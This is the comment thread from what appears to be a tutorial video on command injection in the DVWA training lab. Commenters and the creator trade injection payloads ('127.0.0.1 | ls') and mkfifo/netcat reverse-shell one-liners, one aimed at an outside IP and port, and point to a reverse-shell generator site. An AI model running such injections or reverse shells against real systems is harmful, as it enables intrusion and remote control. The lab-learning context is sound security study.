Very informative and nice video. I learned a lot. Thank you so much!
@xrt5189
3 жыл бұрын
You've got plenty of useful materials. subscribed
@_CryptoCat
3 жыл бұрын
thanks and welcome 🥰
@hariharan4059
2 жыл бұрын
You can use || (OR) also give 127.0.0.@ || ls it will also work Thank you for your great videos really it helps to go further in my career
@iyanna8149
2 жыл бұрын
Thank you! This series helped a lot!
@_CryptoCat
2 жыл бұрын
No problem! Glad it helped 🥰
@Miko-e7x
Жыл бұрын
I wasn't able to execute the whole reverse shell command " | rm /tmp/f;mkfifo /tmp/f;cat/tmp/f | bin/sh -i 2>&1 | nc localhost 1337 > /tmp/f " But I was able to establish a connection by using a simple "nc localhost 1337" Can you please help me whats wrong? Thanks!
@_CryptoCat
Жыл бұрын
Hmmm could be various things, e.g. URL encoding issue or something with the machine (or container) DVWA is being run on. revshells.com is great for finding different shells to work with, and you can use ctrl + U to URL-encode characters in burp suite repeater 😉
@ahmedadwan
2 жыл бұрын
Nice video I learned a lot
@_CryptoCat
2 жыл бұрын
💜
@irishRocker1
3 жыл бұрын
Nice video. good job
@_CryptoCat
3 жыл бұрын
Thank you 🥰
@GonzaloLombardi
3 жыл бұрын
Great Job!
@_CryptoCat
3 жыл бұрын
thanks 🥰
@lordderp1156
Жыл бұрын
What is the command that is used in the low part of the video?
@_CryptoCat
Жыл бұрын
The reverse shell? I normally use the mkfifo one, e.g. "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.42.69 1337 >/tmp/f". You can find a lot of good ones in different languages here though: www.revshells.com
@POKLESS
2 жыл бұрын
In MEDIUM level you could also use for example: "127.0.0.1 | ls" this one was the best for me cause it wont echo the pings only echo the command injected
@mohammedziauddin1385
Жыл бұрын
In Low level use this example: 127.0.0.1;rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc127.0.0.1 4445> /tmp/f
@hariaxieinfinity134
2 жыл бұрын
cool
@brl2123
Жыл бұрын
what is the command used to get reverse shell?
@_CryptoCat
Жыл бұрын
Check this great resource, you can choose from different shells depending on the purpose: www.revshells.com
@pradeeppadmanaban2689
2 жыл бұрын
what is is the command to get root permission ?
@_CryptoCat
2 жыл бұрын
sudo
@MrNhde
2 жыл бұрын
Hi, very good vid! It seems that commands like touch and rm do not work after typing an IP. Could you explain why? Thanks!
@_CryptoCat
2 жыл бұрын
hi, ty 🥰 are other commands working OK? you can do "ls" and "whoami" etc? if so, maybe the user doesn't have permission to create/delete files in the directory.
@MrNhde
2 жыл бұрын
@@_CryptoCat tnx. No..... in the terminal those commands work.... Does they work for you through dvwa?
@_CryptoCat
2 жыл бұрын
@@MrNhde I'm confused now xD Is command injection *not* working for you at all? Or, is only the "rm" and "touch" command *not* working? If it's the latter, the DVWA user probably doesn't have permission to write/delete files. Not sure if that worked for me, don't recall trying those commands.
@MrNhde
2 жыл бұрын
@@_CryptoCat thank you very much for your answering! That was what I thought. Trivail command work under the user of dvwa, but those you need privileges for - don't. Thanks!
Пікірлер: 29